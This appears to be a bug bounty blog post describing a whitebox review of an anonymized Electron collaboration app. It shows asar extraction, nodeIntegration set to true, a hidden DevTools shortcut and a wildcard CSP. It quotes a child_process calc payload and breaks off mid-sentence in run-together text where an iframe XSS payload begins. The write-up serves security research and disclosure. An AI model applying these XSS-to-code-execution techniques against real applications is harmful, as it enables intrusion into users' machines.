For better or worse, Node.js has rocketed up the developer popularity charts. Thanks to frameworks like React, React Native, and Electron, developers can easily build clients for mobile and native platforms. These clients are delivered in what are essentially thin wrappers around a single JavaScript file.
As with any modern convenience, there are tradeoffs. On the security side of things, moving routing and templating logic to the client side makes it easier for attackers to discover unused API endpoints, unobfuscated secrets, and more. Check out Webpack Exploder, a tool I wrote that decompiles Webpacked React applications into their original source code.
For native desktop applications, Electron applications are even easier to decompile and debug. Instead of wading through Ghidra/Radare2/Ida and heaps of assembly code, attackers can use Electron’s built-in Chromium DevTools. Meanwhile, Electron’s documentation recommends packaging applications into asar archives, a tar-like format that can be unpacked with a simple one-liner.
With the source code, attackers can search for client-side vulnerabilities and escalate them to code execution. No funky buffer overflows needed – Electron’s nodeIntegration setting puts applications one XSS away from popping calc.
The dangers of XSS in an Electron app as demonstrated by Jasmin Landry.
I love the whitebox approach to testing applications. If you know what you are looking for, you can zoom into weak points and follow your exploit as it passes through the code.
This blog post will go through my whitebox review of an unnamed Electron application from a bug bounty program. I will demonstrate how I escalated an open redirect into remote code execution with the help of some debugging. Code samples have been modified and anonymized.
My journey began one day when I spotted Jasmin’s tweet and was inspired to do some Electron hacking myself. I began by installing the application on MacOS, then retrieved the source code:
- Browse to the
Applicationfolder. - Right-click the application and select
Show Package Contents. - Enter the
Contentsdirectory that contains anapp.asarfile. - Run
npx asar extract app.asar source(Node should be installed). - View the decompiled source code in the new
sourcedirectory!
Discovering Vulnerable Config 🔗
Peeking into package.json, I found the configuration "main": "app/index.js", telling me that the main process was initiated from the index.js file. A quick check of index.js confirmed that nodeIntegration was set to true for most of the BrowserWindow instances. This meant that I could easily escalate attacker-controlled JavaScript to native code execution. When nodeIntegration is true, JavaScript in the window can access native Node.js functions such as require and thus import dangerous modules like child_process. This leads to the classic Electron calc payload require('child_process').execFile('/Applications/Calculator.app/Contents/MacOS/Calculator',function(){}).
Attempting XSS 🔗
So now all I had to do was find an XSS vector. The application was a cross-platform collaboration tool (think Slack or Zoom), so there were plenty of inputs like text messages or shared uploads. I launched the app from the source code with electron . --proxy-server=127.0.0.1:8080, proxying web traffic through Burp Suite.
I began testing HTML payloads like pwned in each of the inputs. Not long after, I got my first pwned! This was a promising sign. However, standard XSS payloads like or simply failed to execute. I needed to start debugging.
Bypassing CSP 🔗
By default, you can access DevTools in Electron applications with the keyboard shortcut Ctrl+Shift+I or the F12 key. I mashed the keys but nothing happened. It appeared that the application had removed the default keyboard shortcuts. To solve this mystery, I searched for globalShortcut (Electron’s keyboard shortcut module) in the source code. One result popped up:
electron.globalShortcut.register('CommandOrControl+H', () => {
activateDevMenu();
});
Aha! The application had its own custom keyboard shortcut to open a secret menu. I entered CMD+H and a Developer menu appeared in the menu bar. It contained a number of juicy items like Update and Callback, but most importantly, it had DevTools! I opened DevTools and resumed testing my XSS payloads. It soon became clear why they were failing – an error message popped up in the DevTools console complaining about a Content Security Policy (CSP) violation. The application itself was loading a URL with the following CSP:
Content-Security-Policy: script-src 'self' 'unsafe-eval' https://cdn.heapanalytics.com https://heapanalytics.com https://*.s3.amazonaws.com https://fast.appcues.com https://*.firebaseio.com
The CSP excluded the unsafe-inline policy, blocking event handlers like the svg payload. Furthermore, since my payloads were injected dynamically into the page using JavaScript, typical tags failed to execute.Fortunately,the CSP had one fatal error:it allowed wildcard URLs.In particular,thehttps:<iframesrcdoc='
